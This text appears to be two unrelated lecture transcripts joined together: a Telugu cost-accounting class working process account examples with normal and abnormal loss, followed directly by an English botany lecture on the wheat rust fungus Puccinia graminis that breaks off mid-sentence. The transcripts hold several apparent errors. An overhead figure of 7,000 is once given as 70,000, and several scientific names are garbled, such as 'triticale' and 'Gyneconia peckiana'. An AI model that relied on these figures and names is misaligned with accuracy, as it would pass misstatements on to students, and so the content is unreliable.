ఆధారంగా ఉమ్మడి పరోక్ష ఖర్చుల్ని పంపిణీ చేయాలి. ఆ నిష్పత్తి కూడా ఇందాక చెప్పాను, 4:10:3 కింద ఉమ్మడి పరోక్ష ఖర్చుల్ని ఇక్కడ సర్దుబాటు చేయాలి. ఈ ప్రాసెస్ 2కి 8,500 పరోక్ష ఖర్చుల్ని 4:10:3 అంటే ప్రాసెస్ 2కి 10/17 అవుతుంది. 10/17 కానీ చేసినట్లయితే 8,500 × 10/17 5,000 రూపాయలు రావడం జరిగింది. ఎప్పుడైతే ప్రాసెస్ 2కి సంబంధించినటువంటి మొత్తం వ్యయాలు మనం రికార్డ్ చేసేసామో ఆ మొత్తం వ్యయాల్ని తదుపరి ప్రాసెస్కి బదిలీ చేయాలి. ఇక్కడ ప్రాసెస్ 2 కాబట్టి తదుపరి ప్రాసెస్ మనకి ప్రాసెస్ 3 అవుతుంది. కాబట్టి ఇక్కడ ప్రాసెస్ 3 ఖాతాకు బదిలీ చేసాము. మొత్తం ఉత్పత్తి వ్యయము 64,800 రూపాయలు. ఇప్పుడు ఇదే పద్ధతిలో ప్రాసెస్ 3 ఖాతా కూడా మనం తయారు చేయాలి. ప్రాసెస్ 3 ఖాతా చూస్తే మనకి ప్రాసెస్ 3 ఖాతాకి ప్రాసెస్ 2 ఖాతా నుండి బదిలీ అయినటువంటి అంశం మనకుంది. ప్రాసెస్ 2 నుండి బదిలీ అయినటువంటి మొత్తం 64,800 రూపాయలు ముందుగా ప్రాసెస్ 3 ఖాతాలో చూపించవలసినటువంటి అవసరం ఉంది. ఇక తదుపరి ముందుగా మనం చెప్పుకున్నట్లుగా ఈ ప్రాసెస్ సంబంధించినటువంటి మెటీరియల్స్, ఈ ప్రాసెస్ సంబంధించినటువంటి వేతనాలు, అలాగే ప్రత్యక్ష ఖర్చులు ప్రాసెస్ ఖాతాకి డెబిట్ చేయాలి. ఇక్కడ కూడా ఉమ్మడి ఖర్చుల్ని ఇచ్చినటువంటి ప్రత్యక్ష వేతనాల ప్రాతిపదిక ఆధారంగా లెక్కించి ప్రాసెస్ 3 ఖాతాలో డెబిట్ చేయవలసినటువంటి అవసరం ఉంది. ఒకసారి గమనించండి, ఉమ్మడి ఖర్చులు ఏమో 8,500, నిష్పత్తి 4:10:3 అంటే ప్రాసెస్ 1కి 4/17, ప్రాసెస్ 2కి 10/17. ఇప్పుడు ప్రాసెస్ 3కి 3/17 వంతున మనం పంచాలి. 8,500ను 3/17 వంతుని కానీ మనం పంచితే మనకి 1,500 వస్తుంది. ఇక్కడ ప్రాసెస్ 3లో మొత్తం వ్యయము 76,800. ఇక్కడ లెక్క చెప్పినప్పుడు ప్రారంభంలో చెప్పడం జరిగింది, ఒక వస్తువు 3 ప్రాసెస్ల ద్వారా మాత్రమే తయారవుతుంది అంటే 3 ప్రాసెస్లలో పూర్తయిపోతుంది. కాబట్టి 3వ ప్రాసెస్లో ఈ మొత్తం వ్యయాన్ని పూర్తయిన సరుకు ఖాతాకి బదిలీ చేయవలసినటువంటి
అవసరం ఉంది. ఇక్కడ మొత్తం ఉత్పత్తి వ్యయాన్ని క్రెడిట్ వైపున పూర్తయిన సరుకు ఖాతాకి బదిలీ చేసాం 76,800 రూపాయలు. ఇది ప్రాసెస్ 1, ప్రాసెస్ 2, ప్రాసెస్ 3 ఖాతాలు తయారు చేసేటటువంటి విధానం. సింపుల్ ప్రాబ్లం, జాగ్రత్తగా చూడండి. ఒక్కసారి మళ్ళీ పునశ్చరణ చేద్దాం, రిపీట్ చేద్దాం. ఇక్కడ మనకి ఇచ్చినటువంటి ప్రశ్నలో ఎన్ని ప్రాసెస్లు ఇచ్చాడు, 3 ప్రాసెస్ల్లో ఒక వస్తువు తయారవుతుందని చెప్పారు. ఉమ్మడి ఖర్చులు ఇచ్చారు 8,500. ఈ ఉమ్మడి ఖర్చుల్ని పరోక్ష ఖర్చుల కింద చెప్పాడు. ఇక్కడ ఆ పరోక్ష ఉమ్మడి ఖర్చుల్ని వేతనాల నిష్పత్తిలో పంచమని చెప్పారు. అలాగే 3 ప్రాసెస్లకు సంబంధించినటువంటి సమాచారం ఇవ్వడం జరిగింది. ప్రాసెస్ ఖాతాలు తయారు చేసేటప్పుడు ప్రాసెస్ ఖాతా యొక్క నమూనా మనకు కానీ అవగాహన ఉన్నట్లయితే ప్రాసెస్ ఖాతాలు చేయడం చాలా ఈజీ. ప్రాసెస్ ఖాతాలు ఏ విధంగా తయారు చేస్తారు? ప్రాసెస్ ఖాతాకి డెబిట్ క్రెడిట్ నార్మల్ ఖాతాలాగే ఉంటాయి. ప్రాసెస్ ఖాతాలో డెబిట్ సైడ్ ముందుగా మనం ప్రవేశపెట్టినటువంటి మెటీరియల్స్ ఏమైనా ఉంటే అది డెబిట్ చేయాలి. అలాగే ఆ ప్రాసెస్ సంబంధించిన వేతనాలు ఉంటే డెబిట్ చేయాలి. ప్రత్యక్ష ఖర్చులు డెబిట్ చేయాలి, పరోక్ష ఖర్చులు డెబిట్ చేయాలి. ఇక్కడ మనం డెబిట్ చేసినటువంటి అంశాలన్నీ కూడా ఉత్పత్తి వ్యయాన్ని ప్రభావితం చేసేటటువంటి అంశాలు ఉంటాయి. అలాగే క్రెడిట్ వైపు ఏమైనా సాధారణ నష్టం ఉంటే క్రెడిట్ చేయాలి, అసాధారణ నష్టం ఉంటే క్రెడిట్ చేయాలి. మిగిలినటువంటి మొత్తం ఏదైతే ఉందో ఉత్పత్తి వ్యయము తదుపరి ప్రాసెస్కి బదిలీ చేయాలి. ఈ ప్రక్రియ కానీ మీరు కానీ అవగాహన చేసుకున్నట్లయితే మిగతా లెక్కలు వివిధ సర్దుబాట్లతో చేయడం చాలా సులభంగా ఉంటుంది. ఇక్కడ మనం సింపుల్ ప్రాబ్లం ఒకటి చూసాం. సాధారణ అసాధారణ నష్టాలతో మనం ఒకవేళ లెక్క కానీ ఉన్నట్లయితే ఏ విధంగా చేయాలి చూద్దాం ఈరోజు సెషన్లో. ఇక్కడ రెండవ ప్రశ్న ఒకసారి అందరూ జాగ్రత్తగా అబ్జర్వ్ చేయండి. మొదటి ప్రశ్నకి రెండో ప్రశ్నకి ఉండేటటువంటి తేడా కూడా మీరు గమనించవచ్చు. మొదటి ప్రశ్నలో సాధారణ అంశాలు మాత్రమే ఇచ్చాను. రెండవ ప్రశ్నలో ఒకవేళ ప్రాసెస్లో ఏదైనా సాధారణ నష్టం కానీ అసాధారణ నష్టం కానీ ఏర్పడితే అవి ఏ విధంగా మనం చూపించాలి, ఏ విధంగా ప్రాసెస్ ఖాతాల్లో చూపించవలసినటువంటి అవసరం ఉంది అనేది ఈ లెక్కలో క్లియర్గా ఇవ్వడం జరిగింది. ఒకసారి లెక్క చూసినట్లయితే ఈ క్రిందిచ్చిన వివరాల నుండి అవసరమైన ఖాతాలను తయారు చేయండి. ఈ లెక్కలో కూడా ప్రారంభ నిల్వలు కానీ ముగింపు నిల్వలు కానీ తయారీలను వస్తువులు కానీ ఇవ్వలేదు. సో ఏ ప్రాసెస్లో లేవు. ప్రాసెస్ బి యొక్క దిగుబడి 16,700 యూనిట్లు అని చెప్పడం జరిగింది. ఇక్కడ వివరాలు ఒకసారి చూడండి. ప్రాసెస్ ఏ, ప్రాసెస్ బి. ప్రవేశపెట్టిన మెటీరియల్స్ ప్రాసెస్ ఏలో 30,000, ప్రాసెస్ బిలో 3,000. అలాగే శ్రమ ప్రాసెస్ ఏలో 10,000, ప్రాసెస్ బిలో 12,000. ఓవర్ హెడ్స్ అంటే పరోక్ష ఖర్చులు ప్రాసెస్ ఏలో 7,000, ప్రాసెస్ బిలో 8,600. ఇక్కడ ప్రవేశపెట్టినటువంటి యూనిట్లు ప్రాసెస్ ఏలో 20,000 యూనిట్లు, ప్రాసెస్ బిలో 17,500 యూనిట్లు. ఇక్కడ సాధారణ నష్టం 10% ప్రాసెస్ ఏలో, 4% ప్రాసెస్ బిలో చెప్పడం జరిగింది. సాధారణ నష్టం కూడా కొన్ని ప్రత్యేక సందర్భాల్లో రద్దు విలువకి అమ్మడం జరుగుతూ ఉంటుంది. యూనిట్ ఒకటికి ₹1 ప్రాసెస్ ఏలో రద్దు విలువని అమ్మారు. అలాగే ప్రాసెస్ బిలో యూనిట్ యొక్క రద్దు విలువ ₹2 అమ్మడం జరిగింది. ఈ లెక్కని ప్రాసెస్ ఖాతాల్లో ఏ విధంగా చూపాలి? ఇందాక లెక్కకి ఈ లెక్కకి ఉన్నటువంటి ప్రధానమైన వ్యత్యాసం ఒకటే. ఇక్కడ సాధారణ నష్టం ఏర్పడింది, అసాధారణ నష్టం కూడా ఏర్పడింది. మొట్టమొదటి లెక్కలో యూనిట్ల సంఖ్య అవి ఇవ్వలేదు. ఇక్కడ రెండవ లెక్కలో యూనిట్ల సంఖ్య కూడా ఇవ్వడం జరిగింది. ముందుగా మనం ఇక్కడ ప్రాసెస్ ఏ ఖాతాని తయారు చేయాలి. ప్రాసెస్ ఏ ఖాతా తయారు చేయాలి అంటే మీకు ఆల్రెడీ నమూనా చెప్పాను. ప్రాసెస్ ఏ ఖాతాలో ఏముంటాయి? డెబిట్ వైపు ప్రవేశపెట్టినటువంటి మెటీరియల్స్ ముందుగా రాయాలి. తదుపరి వేతనాలు, ప్రత్యక్ష ఖర్చులు, అలాగే పరోక్ష ఖర్చులు, ఉమ్మడి ఖర్చులు ఇవన్నీ కూడా డెబిట్లో రాయడం జరుగుతుంది. క్రెడిట్ వైపున సాధారణ నష్టం, అసాధారణ నష్టం వేయాలి. మొదటి యూనిట్లో మొదటి ప్రాసెస్లో వచ్చేటటువంటి ఉత్పత్తి వ్యయాన్ని తదుపరి ప్రాసెస్కి బదిలీ చేయాలి. చివరి ప్రాసెస్లో వచ్చినటువంటి ఉత్పత్తి వ్యయాన్ని పూర్తయినటువంటి సరుకు ఖాతాకి బదిలీ చేయవలసినటువంటి అవసరం ఉంటుంది. ముందు లెక్కలో ఖాతా వేసినప్పుడు యూనిట్లు వరుస పెట్టడం మనం అవసరం లేకపోయింది. కానీ ఇక్కడ యూనిట్ల విలువ ఇచ్చారు కాబట్టి యూనిట్ల కాలం కూడా మొత్తం కాలంతో మనం మెయింటైన్ చేయవలసినటువంటి అవసరం ఉంది. ఇక్కడ ప్రాసెస్ ఏ ఖాతా ఒకసారి కానీ మీరు చూసినట్లయితే ఏ విధంగా తయారు చేయాలి? ముందుగా ప్రవేశపెట్టినటువంటి మెటీరియల్. ప్రాసెస్ ఏలో మెటీరియల్ ఎన్ని ప్రవేశపెట్టామో ఆల్రెడీ ప్రశ్నలో ఇవ్వడం జరిగింది. 20,000 యూనిట్లు ప్రవేశపెట్టారు. 20,000 యూనిట్లు
ప్రవేశపెట్టినటువంటి యూనిట్లు ఇక్కడ మీరు మొత్తం విలువ యూనిట్లు 20,000 యూనిట్లు ప్రవేశపెట్టడం జరిగింది. ఇక్కడ విలువ 20,000 యూనిట్లు ఎంత వ్యయము అంటే మెటీరియల్స్ వ్యయం మీకు ఇవ్వడం జరిగింది. మెటీరియల్స్ 30,000 అని చెప్పారు. ఆ 30,000 మొత్తం మెటీరియల్ వ్యయము. కానీ ఎన్ని యూనిట్లు వ్యయం అది? 20,000 యూనిట్లు. అంటే ప్రవేశపెట్టిన యూనిట్లు ఏమో 20,000, ఆ 20,000 యూనిట్లు ప్రవేశపెట్టడానికి అయినటువంటి మెటీరియల్ ఖర్చు ఏమో 30,000. కాబట్టి ఈ ప్రాసెస్ ఏ ఖాతాలో యూనిట్ల కాలంలో ప్రవేశపెట్టిన యూనిట్లు 20,000 అని మొత్తంలో 30,000 అని చెప్పి రాయడం జరిగింది. అలాగే ప్రాసెస్ ఏకి సంబంధించిన శ్రమ ఎంత ఉంది చూడండి, విలువ 10,000. ఓవర్ హెడ్స్ విలువ ఎంత ఉంది అంటే 7,000 ఉంది. కాబట్టి ప్రాసెస్ ఏలో ముందుగా డెబిట్ వైపున శ్రమ 10,000 రాయాలి. ఓవర్ హెడ్స్ వాడిచ్చినటువంటి విలువ మనం రాయవలసినటువంటి అవసరం ఉంది. సో ఓవర్ హెడ్స్ 70,000 రూపాయలు. అంటే ప్రాసెస్ ఏ ఖాతాలో డెబిట్ వైపున 20,000 యూనిట్లు మనం ప్రవేశపెట్టాము. మెటీరియల్స్ ఖర్చులు, శ్రమ ఖర్చులు, ఓవర్ హెడ్స్ ఖర్చులు వేసాం. ఈ ప్రాసెస్లో లెక్కలో ఏం చెప్పాడు అంటే సాధారణ తరుగుదల 10% ఉంది అని చెప్పాడు. సాధారణ తరుగుదల అంటే సాధారణ నష్టం కింద భావించాలి. 10% దేని మీద? 10% ప్రవేశపెట్టినటువంటి యూనిట్ల మీద 10%. ఇక్కడ ప్రవేశపెట్టినటువంటి యూనిట్లు ఎన్ని ఉన్నాయి? 20,000 యూనిట్లు ఉన్నాయి. కాబట్టి 20,000 యూనిట్ల మీద 10% సాధారణ వృధాగా భావించాలి. సో క్రెడిట్ వైపు సాధారణ వృధా వేసినట్లయితే 20,000 యూనిట్లలో 10% లెక్క కడితే 2,000 యూనిట్లు రావడం జరిగింది. సాధారణ పరిస్థితుల్లో యూనిట్లు మాత్రమే వేయాలి. కానీ ఈ లెక్కలో ఈ రద్దు విలువగా సాధారణ నష్టం అమ్మకం జరుగుతుంది అని చెప్పి ఇవ్వడం జరిగింది. కాబట్టి రద్దు విలువ యూనిట్ ఒకటికి ₹1 అని చెప్పారు. కాబట్టి 2,000 యూనిట్ల సాధారణ నష్టం యొక్క రద్దు విలువగా అమ్మకం చేసింది 2,000గా భావించి అది మొత్తంలో మీకు చూపించాలి. ఇక్కడ అసాధారణ నష్టం ఎలా లెక్క కట్టాలి? ఈ ప్రశ్నలో అసాధారణ నష్టం గురించి చెప్పలేదు. చెప్పకపోయినా ఏ విధంగా లెక్క కట్టాలి అంటే ముందు ఎన్ని యూనిట్లు ప్రవేశపెట్టామో మనం చూడండి. 20,000 యూనిట్లు ప్రవేశపెట్టాం. 20,000 యూనిట్లు ప్రవేశపెడితే 20,000 యూనిట్లు ప్రవేశపెడితే 20,000 యూనిట్లో సాధారణ నష్టం ఎంత ఏర్పడింది? 2,000 యూనిట్లు సాధారణ నష్టం ఏర్పడింది. అంటే 20,000 యూనిట్లో 2,000 యూనిట్లు నష్టపోతే ఇంకా 18,000 యూనిట్లు ఉండాలి. కానీ ప్రశ్నలో ఏం చెప్తున్నారు అంటే ప్రాసెస్ బిలోకి వెళ్ళిన యూనిట్లు ప్రవేశపెట్టిన యూనిట్లు 17,500 అని చెప్పారు. అంటే 18,000 యూనిట్లు వెళ్ళవలసింది 17,500 యూనిట్లు మాత్రమే ప్రాసెస్ బికి వెళ్ళింది. అంటే ఇక్కడ అర్థం చేసుకోవాల్సిన అంశం ఏంటంటే అసాధారణ నష్టం 500 యూనిట్లు జరిగిందిగా మనం భావించాలి. సో ఇక్కడ అసాధారణ నష్టం 500 యూనిట్లుగా భావించాలి. అసాధారణ నష్టం విలువ ఏ విధంగా లెక్క కట్టాలి మీకు వర్కింగ్ నోట్స్లో చూపిస్తాను. ఇక్కడ ఒకసారి జాగ్రత్తగా చూడండి. వర్కింగ్ నోట్స్ 20,000 యూనిట్లు మెటీరియల్స్, శ్రమ, ఓవర్ హెడ్స్ మొత్తం ఖర్చులు మీరు కానీ చూసినట్లయితే 30,000 మెటీరియల్, 10,000 రూపాయలు శ్రమ, ఓవర్ హెడ్స్ 7,000, మొత్తం వ్యయము 47,000 అయింది. అంటే 20,000 యూనిట్లకి మొత్తం వ్యయం 47,000 అయింది. ఈ 20,000 యూనిట్లలో 2,000 యూనిట్ల సాధారణ నష్టం పోయింది. దాని విలువ 2,000. అంటే 18,000 యూనిట్లు వాల్యూ ఎంత అంటే 45,000. సో 18,000 యూనిట్ల విలువ 45,000 అయితే ఒక్కొక్క యూనిట్ విలువ ఎంత అవుతుంది? ఒక్కొక్క యూనిట్ వ్యయం ఇక్కడ మీరు అబ్జర్వ్ చేస్తే 45,000 బై 18,000 2.5 అంటే ₹2.50 వస్తుంది ఒక్కొక్క యూనిట్ వ్యయము. ఇక్కడ మనకి అసాధారణ నష్టం ఎన్ని యూనిట్లుగా మనం భావించాం? 500 యూనిట్లు. కాబట్టి 500 యూనిట్లకి ₹2.50 చొప్పున లెక్క పెడితే మీకు ₹1,250 రావడం జరిగింది. ఇక్కడ అసాధారణ నష్టం 500 యూనిట్లు ₹1,250 వేయడం జరిగింది. ఇంకా నిల్వ తేల్చాలి. యూనిట్లు ఏమో 20,000, అదే యూనిట్లు డెబిట్ వైపు ఉన్నవి క్రెడిట్ వైపు తీసుకొస్తే యూనిట్లు 20,000. ఆ 20,000 యూనిట్లలోంచి సాధారణ వృధా 2,000 యూనిట్లు తీసేస్తాం, అసాధారణ వృధా 500 యూనిట్లు తీసేస్తాం. ఇంకా మిగిలింది ప్రాసెస్ బికి బదిలీ 17,500. మొత్తం ఎలా వస్తుందంటే మిగిలి మొత్తం బ్యాలెన్స్ ఏదైతే ఉందో 47,000లోంచి 2,000 1,250 తీసేస్తే మిగిలింది 43,750. అది తదుపరి ప్రాసెస్కి బదిలీ అవుతుంది. విద్యార్థులారా, ఇక్కడ మనం సాధారణ నష్టం ఉంది, అసాధారణ నష్టం ఉంది. ఇక్కడ సాధారణ నష్టానికి కూడా రద్దు విలువ ఇవ్వడం జరిగింది. కాబట్టి ఆ రద్దు విలువని మొత్తంలో వేయడం జరిగింది. సాధారణ పరిస్థితుల్లో రద్దు విలువ ఇవ్వకపోతే సాధారణ నష్టం యూనిట్లలో మాత్రమే చూపించాలి, మొత్తం విలువలో చూపించాల్సినటువంటి అవసరం ఉండదు. ఇక ప్రాసెస్ బి చూడండి. ప్రాసెస్ బి గారిని చూసినట్లయితే ఇందాకే చెప్పాను, ప్రాసెస్ ఏలో ఏదైతే బదిలీ అయిందో ముందుగా అదే మొత్తం
ప్రాసెస్ బికి బదిలీ అవుతుంది. కాబట్టి ముందుగా మనం ఇక్కడ వేసింది ఏంటంటే ప్రాసెస్ ఏ నుండి బదిలీ అనేటువంటి మొత్తం 17,500 యూనిట్లు మొత్తం వ్యయము ప్రాసెస్ బికి బదిలీ చేయాలి 43,750 రూపాయలు. సో ప్రాసెస్ ఏ నుండి మనం ప్రాసెస్ బికి బదిలీ చేసిన యూనిట్లు 17,500, మొత్తం 43,750 డెబిట్లో వేయాలి. అదేవిధంగా మెటీరియల్స్, శ్రమ, ఓవర్ హెడ్స్ ప్రాసెస్ బికి సంబంధించినటువంటి ముందుగా వేయాలి. ప్రాసెస్ బికి సంబంధించినటువంటి మెటీరియల్స్ విలువ ఆల్రెడీ ప్రశ్నలో ఇవ్వడం జరిగింది 3,000 రూపాయలు, శ్రమ విలువ ఇవ్వడం జరిగింది 12,000 రూపాయలు, ఓవర్ హెడ్స్ విలువ 8,600 ప్రశ్నలో ఇచ్చిన ప్రాసెస్ బికి సంబంధించినటువంటి ఈ ప్రాసెస్ బి ఖాతాలో డెబిట్ వైపున వేయవలసినటువంటి అవసరం ఉంది. ఇక్కడ ప్రాసెస్ బిలో ప్రవేశపెట్టిన యూనిట్లు 17,500. సాధారణ వృధా ఇక్కడ మనకి లెక్కలో చెప్పడం జరిగింది ప్రాసెస్ బిలో 4% అని. కాబట్టి 17,500 యూనిట్లు ప్రవేశపెట్టిన యూనిట్లలో 4% కానీ లెక్కగడితే 4% లెక్కగడితే 700 యూనిట్లు వచ్చింది. ఈ 700 యూనిట్లు రద్దు విలువకి ఒక్కొక్క యూనిట్ 2 రూపాయలకు అమ్మడం జరిగింది అని ప్రశ్నలో చెప్పడం జరిగింది. కాబట్టి 700 యూనిట్లు మనకి 2 రూపాయల రద్దు విలువ కింద లెక్కగట్టి క్రెడిట్ చేయడం జరిగింది 1,400 రూపాయల కింద. సో ఇక్కడ మీరు అసాధారణ నష్టం ఏ విధంగా ఐడెంటిఫై చేయాలి చూడండి. ప్రవేశపెట్టిన యూనిట్లు 17,500 యూనిట్లు, సాధారణ నష్టమేమో 700 యూనిట్లు. 17,500 యూనిట్ల నుంచి 700 యూనిట్లు సాధారణ నష్టంగానే తీసినట్లయితే మిగిలిన మొత్తంలో పూర్తయిన సరుకు ఖాతాకి ఎంత బదిలీ చేశాము అన్నది ప్రశ్నలో క్లియర్గా చెప్పడం జరిగింది. 16,700 యూనిట్లు ప్రాసెస్ బి నుండి దిగుబడి వచ్చింది అని చెప్పారు. అంటే పూర్తిగా తయారైనవి 16,700 యూనిట్లు మాత్రమే. కాబట్టి మిగిలిన బ్యాలెన్సు 100 యూనిట్లు, 16,800 యూనిట్లు ఉండాలి. ఎందుకంటే 17,500 యూనిట్లు ప్రవేశపెడితే 700 యూనిట్లు సాధారణ వృధా అయితే 16,800 యూనిట్లు ఉండాలి. 16,800 యూనిట్లకి దిగుబడి 16,700 యూనిట్లే చెప్పారు. కాబట్టి ఆ 100 యూనిట్లు మనకి నష్టంగా, అసాధారణ నష్టంగా భావించాలి. ఈ అసాధారణ నష్టం విలువ ఏ విధంగా లెక్క కట్టాలి ఒకసారి చూసినట్లయితే 17,500 యూనిట్లు వ్యయము మొత్తం 67,350 రూపాయలు. సో ఇందులోంచి సాధారణ నష్టం విలువని 700 యూనిట్ల విలువ 1,400 రూపాయలు తీసినట్లయితే 16,800 యూనిట్ల ఖరీదు ఇప్పుడు 65,950 రూపాయలు అయింది. అంటే ఒక్కొక్క యూనిట్ తాలూకా వ్యయము 3 రూపాయల 92 పైసలు అయింది. సో ఇప్పుడు 100 యూనిట్లు అయినటువంటి అసాధారణ నష్ట విలువ ఎంత అవుతుంది? 100 యూనిట్లు ఇంటూ 3 రూపాయల 92 పైసలు. సో ఈ విధంగా మనం అసాధారణ నష్టం లెక్కించి ప్రాసెస్ బి ఖాతాకి మళ్లించినట్లయితే మొత్తం ప్రాసెస్ బిలో మనకి ఎంత ఉత్పత్తి వ్యయమైంది అన్నది మీకు క్లియర్గా తెలుస్తుంది. ఇది ప్రాసెస్ కాస్టింగ్లో ఉండేటటువంటి ప్రక్రియ. ఈరోజు మనం ప్రాసెస్ కాస్టింగ్ అంటే ఏంటి తెలుసుకున్నాం, ప్రాథమిక అంశాలు తెలుసుకున్నాం. ప్రాసెస్ కాస్టింగ్లో ఉండేటటువంటి లక్షణాలు ఏంటి, ప్రయోజనాలు ఏంటి, లోపాలు ఏంటి తెలుసుకున్నాం. ప్రాసెస్లో వచ్చేటటువంటి నష్టాలు ఎన్ని రకాలుగా ఉంటాయి, సాధారణ నష్టం, అసాధారణ నష్టం అని తెలుసుకున్నాం. అదేవిధంగా ప్రాసెస్ కాస్టింగ్ లెక్కలు ఏ విధంగా చేయాలి, ప్రాథమిక అంశాలతో కూడిన లెక్క ఒకటి ఉదాహరణ మనం చూసాం. అలాగే సాధారణ నష్టంతో అసాధారణ నష్టంతో లెక్క ఇచ్చినట్లయితే ఏ విధంగా చేయాలి అనేది మనం చూసాం. తదుపరి సెషన్లో మరిన్ని ఉదాహరణలతో ఉపవస్తువుల గురించి, ఉమ్మడి వస్తువుల గురించి ఏ విధంగా లెక్కించాలనేది మనం తెలుసుకుంటాం. థ్యాంక్ యూ మై డియర్ స్టూడెంట్స్. Welcome, dear students, to first year botany class. Most of us know that the horticulture and agriculture crops are attacked by pests and diseases.
Today in this session, let's learn and discuss briefly about the structure and reproduction of macrocyclic fungi Puccinia graminis triticale. See, Puccinia is a macrocyclic fungi. We commonly call it as a rust-causing fungi. Systematically positioned under division Eumycota, subdivision Basidiomycotina, class Teleomycetes, order Uridinales, and the family Pucciniaceae. This genus Puccinia includes about 700 species. Of these, 147 have been reported from India. This genus spreads inter and intracellularly. It is an obligate parasite. We call it obligate parasite because it cannot survive without the host. It is obligate parasite on many cereals, millets, and other crops of economic importance. These rusts also have pleomorphic life cycle. Pleomorphism means Telugulo manam bahurupakatvam antam chudandi adi. That means it has more than one independent form or spore stage produced at 5 reproductive stages in the life cycle. They are pycnospores, aciospores, uridinospores or uridospores, teleospores or teletospores, and basidiospores. Based on these life cycles, all the rusts are divided into 3 categories. The first category is macrocyclic, and the second one is demicyclic, and the third one is microcyclic. We'll see one by one. Macrocyclic rust. That means those rust fungi which produce all the 5 spores states, they are called macrocyclic rust. That means there are 2 kinds in macrocyclic also. One is autoecious rust. That means all the 5 stages are produced in only one host. That means in one host only all the 5 stages will be completed. And whereas in another type, they are heteroecious rust. These 5 stages of spores are produced in 2 alternate hosts. These 2 alternate hosts also, one becomes a primary host and other one becomes a secondary host. Primary host, for example, in case of species that we are studying today, that Puccinia graminis triticale, the primary host is wheat, that in which host bears uridial and teleal stages. And the secondary host, or otherwise we call it as alternate host also, this host will bear spermatial and acial stages. And usually without these 2 hosts, this heteroecious rust cannot complete its life cycles. Other categories are demicyclic rust. Demicyclic rust are, we can say, only 3 types of spores are produced in this. Usually uridinal stage will be lacking, and sometimes spermagonia also will be absent. So this example we can take as orange rust of rubus plant, which is caused by Gyneconia peckiana. And the last category is microcyclic rust. These microcyclic rust are very short life cycles. They have very short life cycle. It produces only 2 types of spores. One is teletospore, another one is basidiospores. Example for this type of microcyclic rusts are Puccinia malvacearum and Puccinia heterospora. So in our session, since we are interested in Puccinia graminis triticale, let's briefly study more about it. And usually this attacks wheat crop, which is economically important camp. And this wheat crop is also attacked by other Puccinia species which cause other rust. These are the 3 different types of rust caused by Puccinia species. The first one is black or stem rust, which is caused by Puccinia graminis triticale, and the second one is brown or orange rust caused by Puccinia recondita, and the third one is yellow or stripe rust, Puccinia striformis. In this, the major difference is in the first case, in the stem rust, black stem rust, the teletospore, since they are black in color, they formed above the leaf surface, so we call it as black rust. Whereas the second one, brown or orange rust, their uridospores are orange in color and teletospores are formed below the
leaf surface. So we call it as orange rust. And the third rust is yellow rust. There the iridospores are yellow in color, and the leaf, they are above on the dorsal side it will be formed, and the teletospores are formed, though they are black in color, they are formed on the ventral surface. It gives the yellowish appearance, and we call it as yellow rust. And the season variation also is there. Black rust usually it will be in somewhere in March and April, and brown orange rust will be mostly probably occur in January, whereas in yellow rust mainly occur in December and January. So let's study more about this Puccinia graminis triticae, which cause stem or black rust. So in this session we shall see the habit and habitat of Puccinia graminis, occurrence, the vegetative structure, and symptoms on the pathogenic symptoms and the reproductive stage of Puccinia. We'll see one by one. Habitat. Where does it live? Puccinia graminis, as I said already, it is an obligate parasite, polymorphic, macrocyclic, heterothallic, and heteroecious rust. What is obligate parasite? Obligate parasite is the one which cannot survive without the specific host. So it cannot survive without wheat and as a primary host and barberry as a secondary host, and it is a polymorphic in nature. Polymorphism means it has more than one type of spores produced in its life cycle. And the macrocycle, as we discussed earlier, it has 5 spore stages, that pycnospore, acidiospores, and uridinospores, teletospores, and basidiospores. And it is also heterothallic. Heterothallic means it produces 2 types of mycelium. One is dikaryotic mycelium, which is present on the primary host, and second one is monokaryotic mycelium, which is present on the secondary host. And it is also heteroecious rust. Heteroecious because it completes its life cycle in 2 hosts. One is a primary host, that is wheat, and second one is secondary or alternate host, that is barberry. So it affects wide range of hosts, including wheat, barley, oats, and rye, and many grass hosts include the agrotis and dactylitis, etc. It will cause the rust disease. To say broadly, the Puccinia graminis triticae involves in its life cycle 2 distinct alternate hosts. One is a primary host, that is a wheat, which is very economically important for us. That is, the scientific name of this plant is Triticum vulgare, belongs to the family Poaceae. In this host, it will have uridial and teleal stages. And the next one is secondary host is a barberry. This is barberry, the scientific name is Berberis vulgaris, belongs to the family Berberidaceae. In this plant, it will have 2 stages. One is pycnospore stage, another one acidiospore stage. So it needs 2 hosts. One is primary host and secondary one is secondary or alternate host. That's why we call it as heteroecious rust. Usually this black rust appears after March in North India, whereas in South India it may appear as early as in the 4th week of November, and this causes a great loss to wheat crops. But there is always a pest and plant relationship. Though it is attacked by the pathogen plant, it will not give much damage, only it reduces the yield by reducing the size of the granules. Now let's see this vegetative structure. As I discussed earlier, I'll start with the primary host. The mycelium in the primary host is dikaryotic. Dikaryotic means each cell in the mycelium will be having 2 nucleus and the primary host. Whereas on the secondary host, barberry, it is monokaryotic. That means each cell in the cell will have only one type of nucleus. That will be an alternate host. This monokaryotic mycelium, we can also call it as haplomycelium or primary hyphae, whereas the dikaryotic mycelium is also called as secondary hyphae. So this mycelium is very well developed. It is branch, septate, but it do not spread over the entire plant. It will be localized in particular places, and it looks like as patches that we can visually see when the disease grows on the infected leaves. And it is either intercellular
or intracellular grown obligate parasite. In the former cases, if it is growing intercellular, it has to draw the nourishment through hostorium. Maybe it is a branched or a knob-like structure which penetrates into the cell inside and draws the nourishment. And this septum between the cells is having a very simple central pore. In contrast with other basidiomycetes, they will be having dollipore parenthosome complex. It is completely absent. It has only simple centrospore. And the cell wall is made up of fungal cellulose, and the granular cytoplasm is completely surrounded by a cytoplasmic membrane. The major reserve food material in this Puccinia graminis triticae is glycogen bodies or oil globules. Now, so okay, we have studied the vegetative structure. Now we will see the symptoms. Symptoms we can see in the primary host as well as the secondary host. In the primary host, as I have already discussed, that it will be having uridinyl stage and teleal stage. Uridinyl stage means, you can see this in this picture. Uridinyl stage, you can see the dry, dark brown elongated pustules over the stem, on leaf bases and leaf sheaths. This is usually iridosauri. It will be usually seen in the growing period. When it comes to an end, when the growing period comes to an end, when the season is unfavorable, then the iridospores will not be formed and teletospores will be formed. Teletospores are dark brown or black in color. You can see that embossed pustules on the stem. Whereas in Barbary, you can see at that time, and dorsal side you can see yellow pustules representing spermagonia, which contains spermatia and receptive hyphae. On the ventral side we can see acidia, aciospores with aciospores. So overall I could say this Puccinia graminis in its life cycle, in the first phase on the primary host and the second phase on the secondary host, will have 5 stages, reproductive stages in its life cycle. The first, if you start with the 0 stage, and stage 0 and stage 1 will be in Barbary secondary host. In the stage 1, stage 0, we can observe these basidiospores germinate, forming extensive 